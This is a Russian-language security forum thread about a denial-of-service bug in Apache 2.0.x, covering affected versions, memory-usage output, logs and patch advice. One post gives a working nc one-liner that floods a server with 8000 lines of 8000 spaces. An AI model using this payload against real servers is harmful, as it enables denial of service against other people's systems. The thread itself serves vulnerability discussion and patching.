Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Регистрация
Войти
 
Страницы: 1 2 След.
RSS
DoS-атака в Apache
 
Обсуждение статьи DoS-атака в Apache
 
Уже которая за месяц...
 
ветка 1.3.x тоже уязвима, или тоьлко 2.x ?
Я такой толстый, потому что завтрак я съедаю сам, обедом со мной делится друг, а враг отдает мне свой ужин...
 
Только ветка 2.x уязвима.
Affects: 2.0.52, 2.0.51, 2.0.50, 2.0.49, 2.0.48, 2.0.47, 2.0.46, 2.0.45, 2.0.44, 2.0.43, 2.0.42, 2.0.40, 2.0.39, 2.0.37, 2.0.36, 2.0.35
Главное, что не remote code execution/random file access/directory traversal.
 
Зато весь сервак может опустить :(
 
Цитата
ilya
А если поиграться с квотами для апача: с квотами на память, cpu time, место на диске?
 
Хех...
Не, так то конечно!
В принципе, нормально настроеная IDS не пропустит такого.

Я тестировал под FreeBSD 5.2.1 ничего ужасного не произошло. Даже Apache нормально работал.
Да и под Win говорят тоже ничего не происходит :)
Так что, походу только Linux уязвим :))
 
Ничего под линукс тоже не происходит страшного... после первого раза:

PID USER      PR NI VIRT RES SHR S %CPU %MEM    TIME+ COMMAND
23346 apache    20   0 172m 158m 5480 S 0.0 31.6   0:00.00 apache2
23347 apache    16   0 172m 158m 5480 S 0.0 31.6   0:00.00 apache2
23349 apache    17   0 172m 158m 5480 S 0.0 31.6   0:00.01 apache2
23350 apache    16   0 172m 158m 5480 S 0.0 31.6   0:02.30 apache2
23351 apache    16   0 172m 158m 5480 S 0.0 31.6   0:00.00 apache2

на этом и остановилось, а вот после повторного запроса:

PID USER      PR NI VIRT RES SHR S %CPU %MEM    TIME+ COMMAND
23345 apache    19   0 7280 3152 5480 S 0.0 0.6   0:00.00 apache2
23346 apache    20   0 328m 306m 5480 S 0.0 60.9   0:00.00 apache2
23347 apache    16   0 328m 306m 5480 S 0.0 60.9   0:00.00 apache2
23349 apache    15   0 328m 306m 5480 S 0.0 60.9   0:02.25 apache2
23350 apache    16   0 328m 306m 5480 S 0.0 60.9   0:02.30 apache2

Так что, Гость, попробуй раз 10 запустить сплоит и станет плохо и винде и фре, а может у тебя сплоит неправильный )) Попробуй такой

(echo 'GET / HTTP/1.0';for((i=0;i<8000;i++)); do perl -e 'print " "x8000 . "\n"';done) | nc localhost 80
 
Не совсем ясно какой запрос:
GET / HTTP/1.0\n
Потом 8000 пробелов и \n?
 
GET / HTTP/1.0
" " x 8000
" " x 8000
" " x 8000
...
...
...
[8000 раз]
 
2r00t:
То есть
8000 пробелов 8000 раз?!
 
Ни хрена себе, 64 мегабайтами я какую хошь прогу завалю
[write to: kind@list.ru; bears.h12.ru]
 
У меня при 8000 пробелов посланных 800 раз - broken pipe. Ну таким запросом я думаю не только апачь можно убить...
 
Да 8000 пробелов 8000 раз, а нормально написанный софт не завалить хоть 100000 раз по 100000 пробелов. 64 метра с шелла с хорошим каналом, если к тому же, вспомнить сплоит для циски, к-рый делал трафика 2GB, очень даже немного.
Да и суть ошибки в том, что выделенная память не освобождается после снятия запроса, а чилды апача зависают....
 
это 2й апач. он не плодит чайлдов.
Случайный визит в дом умалишенных показывает, что вера ничего не доказывает. ©Гейне Генрих
 
А тогда это что? ))

[Tue Nov 09 17:37:50 2004] [error] [client 127.0.0.1] request failed: error read
ing the headers
[Tue Nov 09 17:46:27 2004] [warn] child process 23346 still did not exit, sendin
g a SIGTERM
[Tue Nov 09 17:46:27 2004] [warn] child process 23346 still did not exit, sendin
g a SIGTERM
[Tue Nov 09 17:46:28 2004] [warn] child process 23346 still did not exit, sendin
g a SIGTERM
[Tue Nov 09 17:46:33 2004] [error] child process 23346 still did not exit, sendi
ng a SIGKILL
 
тогда это ты собрал его без поддержки тредов. =)
у меня он такой гадостью не занимается >)
Случайный визит в дом умалишенных показывает, что вера ничего не доказывает. ©Гейне Генрих
 
a kak obnovit'sja do 2.0.53-dev? (tam eto ispravleno)
na saite apache.org ne nashel [IMG]http://www.securitylab.ru/forum/smileys/smiley18.gif[/IMG]
 
[B]^rage^[B]
Все есть там

[ebuild   R   ] net-www/apache-2.0.52 +berkdb +doc +gdbm -ipv6 +ldap +ssl -static +threads 0 kB
 
Цитата
alrond пишет:
a kak obnovit'sja do 2.0.53-dev? (tam eto ispravleno)

тут:

http://cvs.apache.org/snapshots/httpd-2.0/
Страницы: 1 2 След.
Читают тему (гостей: 1)